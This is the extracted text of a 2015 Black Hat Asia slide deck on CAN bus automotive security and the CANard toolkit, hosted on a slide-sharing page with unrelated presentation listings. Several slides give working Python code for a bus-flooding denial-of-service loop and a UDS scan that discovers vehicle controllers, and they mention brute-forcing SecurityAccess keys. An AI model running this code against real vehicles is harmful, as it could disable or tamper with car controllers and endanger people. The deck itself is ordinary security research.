Video Converter
Audio Converter
Image Converter
PDF Converter
File Compressor
hopping on the can bus

Hopping On the CAN Bus Automotive Security and the CANard Toolkit - PowerPoint PPT Presentation

May 23, 2023 •16 likes •329 views

Hopping On the CAN Bus Automotive Security and the CANard Toolkit Eric Evenchick Black Hat Asia 2015 What is CAN? Controller Area Network Low cost, integrated controllers Types: High speed (differential) Low speed (single

  1. Hopping On the CAN Bus Automotive Security and the CANard Toolkit Eric Evenchick Black Hat Asia 2015

  2. What is CAN? • Controller Area Network • Low cost, integrated controllers • Types: • High speed (differential) • Low speed (single ended) • Fault Tolerant • CAN FD

  3. Why do I care? • Used in: • Industrial Control Systems • SCADA • Pretty much every car • Direct interface with controllers

  4. How CAN Works • Bus : collection of collected controllers • Frame : a single CAN ‘packet’ consisting of: • Identifier - What is this message? • Data Length Code - How long is the data? • Data - What does it say?

  5. How CAN Works

  6. Easy Attacks - DoS while (1) { • Hardware Arbitration send_message_with_id_0(); • Lowest ID wins }

  7. How CAN Works Message Structure

  8. How CAN Works Message Structure

  9. Easy Attacks - Injection • “Trusted” network • All traffic is visible to all controllers • Any controller can send any message

  10. Easy Attacks - Injection

  12. Getting on the Bus • Hardware • USB to CAN • Software • Send and Receive Messages • Encode and Decode Data

  13. CAN Hardware • $$$$ - Vector, Kvaser • $$$ - Peak/GridConnect, ECOMCable • $$ - GoodThopter, OBDuino, CANtact • $ - ELM327 knockoffs (OBD-II)

  14. CAN Software • Proprietary Tools • SocketCAN & canutils • Wireshark • CANard

  15. SocketCAN ifconfig can0 up • CAN to Unix Network Interface cansend can0 123#112233 candump can0 • Included in Linux kernel cangen can0

  16. Wireshark • Trace CAN traffic • Filter, log, sort, etc…

  17. CANard A Python Toolkit for CAN • Hardware Abstraction • Protocol Implementation • Ease of Automation • Sharing of Information

  18. Hardware Abstraction from canard import can from canard.hw import socketcan # create a SocketCAN device dev = socketcan.SocketCanDev('can0') • Hardware devices as classes # start the device dev.start() • dev.start() # create a CAN frame frame = can.Frame(id=0x100) • dev.stop() frame.dlc = 8 frame.data = [1,2,3,4,5,6,7,8] # send the frame • dev.send() dev.send(frame) # receive a frame • dev.recv() frame = dev.recv() # stop the device dev.stop()

  19. DoS Example from canard import can from canard.hw import cantact # create and start device dev = cantact.CantactDev('/dev/cu.usbmodem14514') dev.start() # create our payload frame frame = can.Frame(id=0) frame.dlc = 8 # spam! while True: dev.send(frame)

  20. Diagnostics Protocols • OBD-II • Unified Diagnostic Services

  21. OBD-II • Read basic data • Engine RPM • Vehicle Speed • Throttle Position • Read Fault Codes • Clear Fault Codes

  22. Unified Diagnostic Services • ISO 14229 • Allows diagnostic access to controllers

  23. Unified Diagnostic Services

  24. Unified Diagnostic Services • SecurityAccess • RoutineControl • ReadDataByIdentifier • WriteDataByIdentifier • ReadMemoryByAddress • WriteMemoryByAddress

  25. UDS With CANard import sys from canard.proto.uds import UdsInterface from canard.hw.cantact import CantactDev d = CantactDev(sys.argv[1]) d.set_bitrate(500000) d.start() p = UdsInterface(d) # DiagnosticSessionControl Discovery for i in range(0x700, 0x800): # attempt to enter diagnostic session resp = p.uds_request(i, 0x10, [0x1], timeout=0.2) if resp != None: print ("ECU response for ID 0x%X!" % i)

  26. UDS SecurityAccess • Provides access to protected services Fixed! • Firmware upload 16 bits! • Modifying certain Fixed! variables

  27. Fuzzing Diagnostics • Automated Controller Discovery • Device Memory Mapping • Memory Dump • Determine Memory Permissions • RoutineControl Discovery • SecurityAccess Key Brute Force

  28. ECU AutoDiscovery import sys from canard.proto.uds import UdsInterface from canard.hw.cantact import CantactDev d = CantactDev(sys.argv[1]) d.set_bitrate(500000) d.start() Honda: p = UdsInterface(d) ECU Response for ID 0x740! # DiagnosticSessionControl Discovery for i in range(0x700, 0x800): # attempt to enter diagnostic session resp = p.uds_request(i, 0x10, [0x1], timeout=0.2) if resp != None: print ("ECU response for ID 0x%X!" % i)

  29. Conclusions • CAN Bus Attacks • Denial of Service • Injection • Diagnostics

  30. Conclusions • You will need • Hardware Interface • CANtact • Software Tools • CANard • Wireshark

  31. Thank you! Questions? http://github.com/ericevenchick/canard http://cantact.io @ericevenchick

Recommend

The Bus Services Bill and Municipal Bus Companies Summary Why we need bus services What

The Bus Services Bill and Municipal Bus Companies Summary Why we need bus services What

The Bus Services Bill and Municipal Bus Companies Summary Why we need bus services What are municipal bus operators? Network Warrington Being commercial/serving the community Bus Services Bill Value to Town Centres

523 views • 17 slides
Consolidated Bus Stops 2015-2016 What is a consolidated bus stop? A consolidated bus stop is a

Consolidated Bus Stops 2015-2016 What is a consolidated bus stop? A consolidated bus stop is a

Consolidated Bus Stops 2015-2016 What is a consolidated bus stop? A consolidated bus stop is a centralized stop that is designed to reduce ride time to and from school. Sign up and use of these bus stop locations are strictly voluntary

118 views • 10 slides
Consolidated Bus Stops 2020-2021 What is a consolidated bus stop? A consolidated bus stop is

Consolidated Bus Stops 2020-2021 What is a consolidated bus stop? A consolidated bus stop is

Consolidated Bus Stops 2020-2021 What is a consolidated bus stop? A consolidated bus stop is a centralized stop that is designed to reduce the ride time to and from school. Sign up and use of these bus stop locations are strictly

112 views • 10 slides
Inter&Integrated*Circuit*Bus (I 2 C*Serial*Bus) http://www.i2c&bus.org/ 1 I 2 C*OVERVIEW

Inter&Integrated*Circuit*Bus (I 2 C*Serial*Bus) http://www.i2c&bus.org/ 1 I 2 C*OVERVIEW

Inter&Integrated*Circuit*Bus (I 2 C*Serial*Bus) http://www.i2c&bus.org/ 1 I 2 C*OVERVIEW The'name'stands'for'Inter'3 Integrated'Circuit'Bus' (Developed'by'Philips'in'the'early'1980s)

395 views • 26 slides
System Buses Chapter 5 S. Dandamudi Outline Introduction Bus arbitration Dynamic

System Buses Chapter 5 S. Dandamudi Outline Introduction Bus arbitration Dynamic

System Buses Chapter 5 S. Dandamudi Outline Introduction Bus arbitration Dynamic bus arbitration Bus design issues Implementation Bus width Centralized Bus type Distributed Bus operations Example

1.16k views • 82 slides
Input Front side bus A Front side bus B controller Bus #0 HI North bridge Output Bus #0

Input Front side bus A Front side bus B controller Bus #0 HI North bridge Output Bus #0

Calcolatori Elettronici e Sistemi Operativi System architecture example PCI PCI express CPU CPU CPU CPU express dev Memory dev Cache Cache Cache Cache Graphics Input Front side bus A Front side bus B controller Bus #0 HI

416 views • 6 slides
System Buses Chapter 5 S. Dandamudi Outline Introduction Bus arbitration Dynamic

System Buses Chapter 5 S. Dandamudi Outline Introduction Bus arbitration Dynamic

System Buses Chapter 5 S. Dandamudi Outline Introduction Bus arbitration Dynamic bus arbitration Bus design issues Implementation Bus width Centralized Bus type Distributed Bus operations Example

742 views • 41 slides
lecture 22 Input / Output (I/O) 4 - asynchronous bus, handshaking - serial bus Mon.

lecture 22 Input / Output (I/O) 4 - asynchronous bus, handshaking - serial bus Mon.

lecture 22 Input / Output (I/O) 4 - asynchronous bus, handshaking - serial bus Mon. April 4, 2016 "synchronous" bus = clock based (system bus clock is slower than CPU clock) "asynchronous" bus = not clock

548 views • 32 slides
School Improvement Plan Island Hopping 2016-17 Strategy Islands Shoreline - The SIP Map

School Improvement Plan Island Hopping 2016-17 Strategy Islands Shoreline - The SIP Map

School Improvement Plan Island Hopping 2016-17 Strategy Islands Shoreline - The SIP Map Charting the Course between islands, as opposed to a single journey directly to the destination. School Improvement Process Island hopping is the

420 views • 21 slides
Bus Ramps Public Outreach Presentation September 10, 2014 1 Bus Ramp Team Webcor -Obayashi

Bus Ramps Public Outreach Presentation September 10, 2014 1 Bus Ramp Team Webcor -Obayashi

Bus Ramps Public Outreach Presentation September 10, 2014 1 Bus Ramp Team Webcor -Obayashi CM/GC: Shimmick Construction Contractor: Construction Turner Construction Oversight: TJPA Owner: 2 Bus Ramp Scope of Work Bus Ramps Overall

522 views • 31 slides
2019-2020 What is a consolidated bus stop? A consolidated bus stop is a centralized stop that

2019-2020 What is a consolidated bus stop? A consolidated bus stop is a centralized stop that

Consolidated Bus Stops 2019-2020 What is a consolidated bus stop? A consolidated bus stop is a centralized stop that is designed to reduce the ride time to and from school. Sign up and use of these bus stop locations are strictly

355 views • 10 slides
AC Transit Bus Storage Facility July 9, 2015 TJPA Board Meeting TJPA Board Meeting Bus Storage

AC Transit Bus Storage Facility July 9, 2015 TJPA Board Meeting TJPA Board Meeting Bus Storage

AC Transit Bus Storage Facility July 9, 2015 TJPA Board Meeting TJPA Board Meeting Bus Storage Facility July 9, 2015 Bus Storage Facility Site Overview Critical Functions: 1. Bus Storage 2. Staff Facilities and Operational Storage 3.

524 views • 13 slides
What is Bus Rapid Transit? What is Bus Rapid Transit? Sarah Jo Peterson Infrastructure

What is Bus Rapid Transit? What is Bus Rapid Transit? Sarah Jo Peterson Infrastructure

What is Bus Rapid Transit? What is Bus Rapid Transit? Sarah Jo Peterson Infrastructure Initiative Urban Land Institute sarah.peterson@uli.org sarah.peterson@uli.org December 15, 2009 Is Bus Rapid Transit p Bus lines that work like

238 views • 7 slides
2014 Customer Satisfaction Survey Local Bus New York City Transit 1 Local Bus Survey Context

2014 Customer Satisfaction Survey Local Bus New York City Transit 1 Local Bus Survey Context

2014 Customer Satisfaction Survey Local Bus New York City Transit 1 Local Bus Survey Context Over the past year: Local bus ridership recorded decreases over the past year for average weekday (-2.2%) and average weekend (-0.8%) Bus

375 views • 16 slides
Heritage High School 515 Bus Details Johnsons Coaches General Bus Information Make sure that

Heritage High School 515 Bus Details Johnsons Coaches General Bus Information Make sure that

Heritage High School 515 Bus Details Johnsons Coaches General Bus Information Make sure that you have read the Heritage Code of Conduct for bus travel and ensure that you follow this on every journey. Arrive at the bus stop in plenty of

604 views • 11 slides
2010 Bus Service Reduction Implementation and Customer Information Plan 1 Bus Company Long

2010 Bus Service Reduction Implementation and Customer Information Plan 1 Bus Company Long

2010 Bus Service Reduction Implementation and Customer Information Plan 1 Bus Company Long Island Bus New York City Transit Approved 2010 Service Reductions NYCT Buses Discontinue service on 21 local and 12 express bus routes

219 views • 7 slides
Safe and Robust Robot Maneuvers Based on Reach Control Marijan Vukosavljev, Ivo Jansen, Mireille

Safe and Robust Robot Maneuvers Based on Reach Control Marijan Vukosavljev, Ivo Jansen, Mireille

Safe and Robust Robot Maneuvers Based on Reach Control Marijan Vukosavljev, Ivo Jansen, Mireille E. Broucke, Angela P. Schoellig Overview Hybrid Control Methodology Results 1 3 4 Novel hybrid control framework 1) The allowable region is that

317 views • 5 slides
AngularJS Introduction Directives, Modules, Expressions, Controllers Why Angular Good

AngularJS Introduction Directives, Modules, Expressions, Controllers Why Angular Good

AngularJS Introduction Directives, Modules, Expressions, Controllers Why Angular Good choice for creating dynamic website with JavaScript Angular helps you organize your JavaScript Angular helps you create responsive (fast) websites

666 views • 17 slides
Second Screen WG/CG TPAC 2019 - Day 1 Peter Thatcher (pthatcher@google.com) Mark Foltz

Second Screen WG/CG TPAC 2019 - Day 1 Peter Thatcher (pthatcher@google.com) Mark Foltz

Second Screen WG/CG TPAC 2019 - Day 1 Peter Thatcher (pthatcher@google.com) Mark Foltz (mfoltz@google.com) Fukuoka September 2019 Day 1 - Outline Introductions, Agenda Bashing OSP 1.0 Spec: Remote Playback cont'd, Streaming Overview &

1.16k views • 113 slides
2D GAMES AS CYBER-PHYSICAL SYSTEMS VIDYA NARAYANAN 1 MOTIVATION Physics based games with

2D GAMES AS CYBER-PHYSICAL SYSTEMS VIDYA NARAYANAN 1 MOTIVATION Physics based games with

2D GAMES AS CYBER-PHYSICAL SYSTEMS VIDYA NARAYANAN 1 MOTIVATION Physics based games with discrete game controllers are hybrid systems Impossible games are no fun Game designs need correctness or playability guarantees

330 views • 30 slides
Generalized Model Predictive Control (Discretely Generalized MPC) Sa sa V. Rakovi c, Ph.D.

Generalized Model Predictive Control (Discretely Generalized MPC) Sa sa V. Rakovi c, Ph.D.

Generalized Model Predictive Control (Discretely Generalized MPC) Sa sa V. Rakovi c, Ph.D. DIC CSR @ UT Austin ISR @ UMD College Park, February 24, 2016 Opening Model Predictive Control of the Day Before Yesterday Model Predictive

517 views • 37 slides
Holistic Control for Wireless Control Systems Yehan Ma CSE 521S Industrial Process Automation

Holistic Control for Wireless Control Systems Yehan Ma CSE 521S Industrial Process Automation

Holistic Control for Wireless Control Systems Yehan Ma CSE 521S Industrial Process Automation Large Scale Challenging environment q Physical plant Relative low speed q Network communication Stability is critical q Health, Safety, and

394 views • 38 slides
Consistency in SDN Aurojit Panda, Wenting Zheng, Xiaohe Hu, Arvind Krishnamurthy, Scott Shenker

Consistency in SDN Aurojit Panda, Wenting Zheng, Xiaohe Hu, Arvind Krishnamurthy, Scott Shenker

Consistency in SDN Aurojit Panda, Wenting Zheng, Xiaohe Hu, Arvind Krishnamurthy, Scott Shenker Distributed SDN Today Replicated Replicated Replicated Controller Controller Controller Consistency Layer Switch Switch Switch Switch

735 views • 39 slides
From Control Model to Program: Investigating Robotic Aerial Vehicle Accidents with M AYDAY Taegyu

From Control Model to Program: Investigating Robotic Aerial Vehicle Accidents with M AYDAY Taegyu

From Control Model to Program: Investigating Robotic Aerial Vehicle Accidents with M AYDAY Taegyu Kim 1 , Chung Hwan Kim 2 , Altay Ozen 1 , Fan Fei 1 , Zhan Tu 1 , Xiangyu Zhang 1 , Xinyan Deng 1 , Dave (Jing) Tian 1 , Dongyan Xu 1 1 Purdue

520 views • 17 slides

More recommend

Explore More Topics

Stay informed with curated content and fresh updates.

animals pets art culture automotive transportation business finance computer internet construction architecture education-career electronics communication

Logo Sambuz

Unleash a World of Digital Possibilities—Browse, Share, and Explore Content Without Boundaries

Useful Links

About Us Privacy Services FAQ's Contact

Newsletter

Stay Informed & Inspired—Subscribe for the Latest Updates, Tips, and Exclusive Content Directly to Your Inbox.

Mail Us

mail@sambuz.com

2026 SAMBUZ, All right reserved.